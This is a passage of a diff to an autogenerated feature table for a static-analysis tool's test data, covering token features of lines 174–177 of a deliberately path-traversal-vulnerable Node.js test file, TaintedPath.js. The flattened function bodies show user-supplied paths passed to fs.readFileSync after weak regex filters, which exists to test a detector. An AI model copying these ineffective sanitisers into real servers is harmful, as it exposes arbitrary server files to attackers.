calleeImports | url | @@ -6189,6 +64342,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:174:52:174:53 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:174:52:174:53 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:174:52:174:53 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:3:176:54 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:7:176:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:7:176:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:7:176:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:7:176:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:7:176:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6197,6 +64390,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:13:176:53 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:176:16:176:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:16:176:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:16:176:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:16:176:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:16:176:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | calleeImports | fs | @@ -6206,6 +64419,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:29:176:52 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:176:34:176:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:34:176:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:176:34:176:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:176:34:176:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:176:34:176:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:42:176:47 | /[.]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:176:42:176:47 | /[.]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:176:42:176:47 | /[.]/g | calleeImports | url | @@ -6224,6 +64442,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:176:50:176:51 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:176:50:176:51 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:176:50:176:51 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace 